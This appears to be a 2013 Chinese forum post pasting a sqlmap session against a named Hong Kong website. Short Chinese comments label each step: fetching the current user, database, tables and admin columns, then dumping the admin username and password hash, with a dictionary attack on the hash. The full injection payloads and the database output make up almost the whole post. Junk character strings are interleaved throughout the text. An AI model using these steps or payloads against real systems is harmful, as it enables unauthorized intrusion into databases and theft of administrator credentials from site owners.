D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
4 z2 h+ g# |+ \& E% z" dms "Mysql" --current-user /* 注解:获取当前用户名称
; B3 C _6 I9 r9 h7 c sqlmap/0.9 - automatic SQL injection and database takeover tool
4 J2 l7 Y! e: O1 n http://sqlmap.sourceforge.net starting at: 16:53:54
; ]$ t! ~$ o# A% W( g* w4 @; F[16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as2 T: n' D! ^& r9 Y9 W4 O: g
session file5 l+ I2 F/ R, t$ [7 @6 Y. o
[16:53:54] [INFO] resuming injection data from session file
2 V% Y- ]) A7 u. m[16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
- R! }& v' [9 e+ H- Q[16:53:54] [INFO] testing connection to the target url
- Z& i( b3 x7 I f2 j: i# Ssqlmap identified the following injection points with a total of 0 HTTP(s) reque
5 X0 \0 t$ Y! u$ osts: a$ h; @3 G* q
---% U1 K& O& _% L9 c; c" | [% R! e
Place: GET
8 h: ^! b1 e! t+ d) ZParameter: id7 \. y, V Z+ V% M! A8 B
Type: boolean-based blind
, v) g g0 b( i2 D6 ?, T& Q Title: AND boolean-based blind - WHERE or HAVING clause
1 `$ @/ r4 Y+ [0 g. h Payload: id=276 AND 799=799
* G, H# t3 | W Type: error-based
. p6 `3 M! o8 x& l$ m Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause- T) D1 D4 h( Y4 r( e$ z; Z
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
. I r1 d6 z0 R8 `6 @: L/ C, ]120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58 ?7 ]7 [8 f: N r
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)- v) S, O9 c- z% t
Type: UNION query" w( G' e0 _% {% @& }
Title: MySQL UNION query (NULL) - 1 to 10 columns
* F: r% @" H7 t7 M. |, K* ?, ^! Q Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR, Q. Y9 R3 N; M0 u; Z7 S1 M: N
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),9 `" B( R* e3 S: q" n8 v" w- u
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
& ^4 I0 _3 f8 ]4 ` ]( f Type: AND/OR time-based blind
& ]% U; @& w$ e0 O( [ Title: MySQL > 5.0.11 AND time-based blind1 \' X: n5 z8 |1 m! `* [" k) _# ?
Payload: id=276 AND SLEEP(5)
& y5 K6 S1 H% `& Y: G' a---
8 r% _! @2 P( k) o[16:53:55] [INFO] the back-end DBMS is MySQL, k: S2 B6 E% f9 f4 R7 A
web server operating system: Windows
; E/ h. x, h& D8 j3 P, Z* Jweb application technology: Apache 2.2.11, PHP 5.3.0
$ A' s* b: r4 Z+ g' Kback-end DBMS: MySQL 5.0) S5 u! ^) j5 e. O1 w
[16:53:55] [INFO] fetching current user5 R8 }8 j! |# e: V( _
current user: 'root@localhost' 0 L! G! e6 x7 ]& H
[16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
% {7 T: V% Z. l: `" ztput\www.wepost.com.hk' shutting down at: 16:53:58
. ^' a$ d* h- \- B. S0 t9 u
: U& L* g* C' p- }D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db: w4 ?3 J! W$ I4 r2 k b( Z! ^
ms "Mysql" --current-db /*当前数据库" [$ [$ Z! ?! C/ C
sqlmap/0.9 - automatic SQL injection and database takeover tool, x8 C- o. ?" Q! w. |
http://sqlmap.sourceforge.net starting at: 16:54:16# v( y* g0 p9 U/ p. D
[16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as, J& Z4 p1 j6 X
session file
. q& c1 N7 n* Q2 M' [[16:54:16] [INFO] resuming injection data from session file
8 T T$ w; p! `3 _[16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file1 l- e) [- N0 v: k3 d5 w9 j) v) ~
[16:54:16] [INFO] testing connection to the target url2 K" P0 C- Z# c6 l5 }0 v
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
, Q6 `5 _0 L! [7 E$ T% b3 h1 ~sts:
8 @- o. X% ^) |! A/ }---
. } N, b0 G9 I& Y9 }' z# _Place: GET2 y6 U) h: G8 f' S h5 O3 y, q
Parameter: id
& d B7 z! Y2 i" R! p1 W Type: boolean-based blind
k( `; H. p2 h k2 n Title: AND boolean-based blind - WHERE or HAVING clause1 g6 b) G: a# I2 v7 R' [
Payload: id=276 AND 799=799) b/ C0 u. D# N! B+ j) O' n
Type: error-based
; J5 \3 E/ ]! s- y5 k. |0 w/ N Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
5 v% G( p1 Z& C. i& b Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,0 D0 w7 q$ \/ D5 j, ~0 Y5 V9 N
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
- [/ {/ {( z2 T7 P6 x( l% ]9 U),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
4 m6 [- I/ s% V; ` Type: UNION query
3 H/ q) k/ Q/ } w$ q' }% l( w Title: MySQL UNION query (NULL) - 1 to 10 columns5 q% S7 B$ ^2 A* C9 i
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR) X8 {! u2 a; k& E
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
/ J( k' z) p2 S2 ~8 o; _CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
, X& z# _5 p' I Type: AND/OR time-based blind7 Z8 @$ j& D% M
Title: MySQL > 5.0.11 AND time-based blind5 O. c7 Q/ e. K0 y1 s/ K) k
Payload: id=276 AND SLEEP(5), v6 }7 d, g$ I. e
---9 U, L( }7 a' t( J- D3 H7 Q
[16:54:17] [INFO] the back-end DBMS is MySQL
; h: E# e) C. a: p mweb server operating system: Windows _, k2 t. O9 S$ A) H
web application technology: Apache 2.2.11, PHP 5.3.0& z6 m5 [' k T
back-end DBMS: MySQL 5.0* d8 H6 H# O6 E/ D
[16:54:17] [INFO] fetching current database
: y; @ Y! k0 F; P* r8 X& }9 k9 icurrent database: 'wepost'
- Z' U j7 c' N) z f0 \[16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
& w7 }1 G2 x9 O" D' J: j+ m9 Otput\www.wepost.com.hk' shutting down at: 16:54:18- _, u7 W( u# [, g) p% ]
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
: @: o! b9 s% kms "Mysql" --tables -D "wepost" /*获取当前数据库的表名
" W" d1 q2 g. f3 E! `: D- ~+ | sqlmap/0.9 - automatic SQL injection and database takeover tool
2 a- ]8 E q8 J% M) ~+ R4 P5 o7 p http://sqlmap.sourceforge.net starting at: 16:55:251 v0 S* C2 ~ ^. B
[16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
% |6 w. [ a1 |# ~) I" s9 L4 c session file
, j* N1 }! {) _" i( M. m. o( m[16:55:25] [INFO] resuming injection data from session file
4 q% H- j/ x3 e[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file( W! t ` d$ C% [$ p( a
[16:55:25] [INFO] testing connection to the target url
1 \ E: z7 f- x$ P* isqlmap identified the following injection points with a total of 0 HTTP(s) reque, Y0 U" t V+ S) G s* [
sts:) r. q6 S4 F) L6 x6 F F7 [* X) o0 s
---
8 ]% v+ M4 r4 E2 w( uPlace: GET
4 o9 ^( ?: f* R O; ~# \3 y @Parameter: id
7 t* u) Z0 m' P4 f Type: boolean-based blind/ P8 B7 x$ m# Y
Title: AND boolean-based blind - WHERE or HAVING clause
/ W, o5 R$ U. R+ H Payload: id=276 AND 799=799
e) x1 y4 K# [4 R( s* |7 J G Type: error-based& Q" Z( P. m& t1 q3 E7 o
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause' b4 H! f; V+ r
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,' R8 x. R7 U! h
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
: Y4 N5 ~1 M1 ?),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
/ S5 P( |3 P C% M Type: UNION query0 Q6 B/ T* k! f. q$ Y
Title: MySQL UNION query (NULL) - 1 to 10 columns
$ W; W0 P1 _5 a2 }& V* k Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
7 r3 Q/ o- m3 B1 n6 u9 s2 f; _2 h K8 M(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),! Z, ~! n/ A+ z0 u- l9 Q- C
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
3 f8 F( y6 ^3 ~ Type: AND/OR time-based blind
& ]; Y4 R& C3 A% L Title: MySQL > 5.0.11 AND time-based blind
+ O Z; y" G5 S Payload: id=276 AND SLEEP(5)
+ E7 e8 L, s0 w---
7 ^6 p; V' H% B/ [ c% p5 _0 o[16:55:26] [INFO] the back-end DBMS is MySQL
! [$ Q' w5 E" G' ]& t9 H- o/ \1 I, pweb server operating system: Windows
# l- c* s; r4 i+ f; oweb application technology: Apache 2.2.11, PHP 5.3.0
, c- K' C4 S( F' ~back-end DBMS: MySQL 5.0
+ H3 I: v$ S1 ^8 i* K[16:55:26] [INFO] fetching tables for database 'wepost'7 o, z C2 r% H
[16:55:27] [INFO] the SQL query used returns 6 entries
; c U- ]- Q/ r$ R9 S5 Y' s/ r9 XDatabase: wepost
$ V* i9 j* ~, m+ B[6 tables]
8 o, [& h( k8 }) p* m: }" l+-------------++ e6 }- R- g9 s$ T s# f& r0 f
| admin |$ F) ?6 e' g$ \0 `) z( \
| article |
! ?! Y1 G. s% g8 S" m# C6 c% M& U| contributor |$ h! L+ c# J% b
| idea |! d; M: d8 J4 |$ v2 _+ C
| image |4 x* R5 f8 E% m: m7 w1 j! b
| issue |
* U, X3 N% ?2 ^4 I3 V6 F+-------------+
; q% x3 T4 n8 O+ p1 I/ S[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou8 X. S9 t0 D* j! f
tput\www.wepost.com.hk' shutting down at: 16:55:33. w* u' N: Z4 ~- ~* _: Q4 H
- W$ f+ M- \2 r( n# _3 U
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db9 W; M6 g+ y# i" x
ms "Mysql" --columns -T "admin" users-D "wepost" -v 0 /*获取admin表的字段名4 L5 Z2 r, f) E+ t
sqlmap/0.9 - automatic SQL injection and database takeover tool
+ B* i5 ~4 A; a3 w- e# v/ Y) J http://sqlmap.sourceforge.net starting at: 16:56:06. O3 @. G; N( H0 o0 X: ?7 q
sqlmap identified the following injection points with a total of 0 HTTP(s) reque" ^2 u) |9 D0 b* T- o
sts:0 I( j" ? Q. I" ~
---; E1 l$ a: [! ^9 S+ S0 _
Place: GET
: B5 B7 l, O, AParameter: id+ B7 g! N; O+ A
Type: boolean-based blind$ E6 M1 o/ v. `: `. {6 E4 F7 U* i
Title: AND boolean-based blind - WHERE or HAVING clause
% x1 f- V. `2 i2 [" g8 {$ z- [ Payload: id=276 AND 799=799
& [- W% D: H: M$ V( d Type: error-based
; j a. V4 E# s4 J2 l Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause: o2 f4 {: F4 T7 s/ w( L4 o: c
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,: d) q$ `7 @$ V' q/ I7 p
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
2 J2 h2 E* N$ V1 n. n" Q- u),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)# Y8 I7 P$ Y- o# f# |; j1 c1 c2 V+ q
Type: UNION query, r3 A' ^. [9 S. Z7 x# \
Title: MySQL UNION query (NULL) - 1 to 10 columns
& d8 G0 _: K( n) J Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
9 J g9 D& P5 K/ I/ L! j(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
0 N, b7 B+ s+ S; F; d0 TCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL# {& m* `+ h& z' D5 E) Z
Type: AND/OR time-based blind
! P |' `+ U. f Title: MySQL > 5.0.11 AND time-based blind1 h. S1 r1 U* N) O
Payload: id=276 AND SLEEP(5)$ s- Z4 f0 d8 D1 Y& M+ M8 Z- j
---
% U. O3 n) I0 d5 ~6 q5 l& t# b, gweb server operating system: Windows* x6 k: H' G' P& N, f
web application technology: Apache 2.2.11, PHP 5.3.0
- A( G8 A, S2 v) C% `: a# ]- a# Vback-end DBMS: MySQL 5.0
* n% a% P3 ^+ w' F0 i- [1 U2 F[16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\se4 a5 b( |7 M# f$ _7 j9 v! h
ssion': wepost, wepost
% n4 f# @! _* q/ _Database: wepost
! D- z" p( ^$ xTable: admin( j& z: _) ~, }* f; N' K! ]
[4 columns]0 ]/ w' f8 A1 N# T# h
+----------+-------------+
) N- ?! Q0 O, H3 k| Column | Type |
9 E8 |3 a- f1 s( T+ p! B, R+----------+-------------+1 w* z- U' V, N0 V
| id | int(11) |
6 c8 x+ {3 @( }' s) _9 _0 L| password | varchar(32) |( S6 j& `& r" l! r: Y
| type | varchar(10) |3 R# l9 d7 s" C" l
| userid | varchar(20) |
' I& o* K: V7 Z* j! j5 F, u+----------+-------------+% @" k- |9 ~' L8 v3 s* N# m4 [
shutting down at: 16:56:193 r9 x( K {( _& W, l6 S+ C
5 }% s- N5 n# c
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db* C& w# s L3 b1 _
ms "Mysql" --dump -C "userid,password" -T "admin" -D "wepost" -v 0 /*获取字段里面的内容
/ o% M( F2 ~7 H( ^' j; A$ v9 q sqlmap/0.9 - automatic SQL injection and database takeover tool
" O& L$ X8 F0 [# R http://sqlmap.sourceforge.net starting at: 16:57:140 r! n) Q4 q2 e+ e2 \
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
' U, n8 }# ?& Gsts: H9 B- [5 M. i, e$ |- c! g
---
0 ?" S5 t0 H( G7 o# yPlace: GET) q" @, {7 ]) T8 d, x1 B4 \ j$ |
Parameter: id
, A* k5 i( V* c1 ] Type: boolean-based blind. E2 ^% b( |6 B, |
Title: AND boolean-based blind - WHERE or HAVING clause
+ n8 P$ g* a, i9 d7 m* D0 H1 H Payload: id=276 AND 799=799- r# Y7 ~- `+ |: |
Type: error-based5 w I7 R' c9 h4 K+ @
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
" R3 o: p2 Z# B$ }: P; o Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,! b, {: N/ }9 {
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
2 @/ V8 F8 d' a3 m% i' s) b),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)4 G* V9 @! g" B7 @2 Y
Type: UNION query; x9 r3 w4 u- p9 u8 _& p r& A
Title: MySQL UNION query (NULL) - 1 to 10 columns8 T5 X0 T( u' U2 h% i
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
' R+ @6 S! \' |$ A(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),. b* w7 v4 o" d: M, l* ^5 c
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
0 K+ b$ _+ M$ l5 B8 |' t$ o2 \7 s! w Type: AND/OR time-based blind7 f, ^. A- W- V1 ]5 M; `8 {6 }5 h
Title: MySQL > 5.0.11 AND time-based blind: x8 j- d" `/ Y4 @5 g
Payload: id=276 AND SLEEP(5)1 \% g3 e5 G k& M( u; [
---
7 k" M( ~" u* ~6 K* ]" N( n' Eweb server operating system: Windows
, a& W6 u4 p7 ?- v7 h! C. g- c4 @web application technology: Apache 2.2.11, PHP 5.3.0! v- l# L8 P" J# ?5 i% F8 k8 E3 Y5 F
back-end DBMS: MySQL 5.0
4 @/ W5 a M/ C9 k3 c8 U. y$ _7 H+ Hrecognized possible password hash values. do you want to use dictionary attack o
* _5 u9 Z8 y3 X# F6 W$ }7 ]9 ^n retrieved table items? [Y/n/q] y+ i; b8 {! K, ? i: n- q
what's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]
9 z4 ]! |8 d' s4 r. K) N+ [do you want to use common password suffixes? (slow!) [y/N] y7 u( c3 [- T( L0 ~! Z, H
Database: wepost
. B5 K. \2 U% m2 Y9 T! nTable: admin
' E- q5 Y! e- B# n. A9 s[1 entry]+ ~0 B, \& `. g; C3 m
+----------------------------------+------------+
6 A) k3 e3 m8 G+ N7 Q0 U5 f| password | userid |. \" J* ^9 p" X1 _- M: C# |
+----------------------------------+------------+$ `. N4 {9 i. ^' t( z- e' O2 M. w
| 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |2 d, u0 D6 O4 M$ q
+----------------------------------+------------+
! [; I. t. U5 l: x shutting down at: 16:58:14
' K& ~* ], d0 n2 p5 ~7 j1 h8 P$ s Y7 W H) g6 b
D:\Python27\sqlmap> |
发表于 2013-4-4 22:18:49
收藏
支持
反对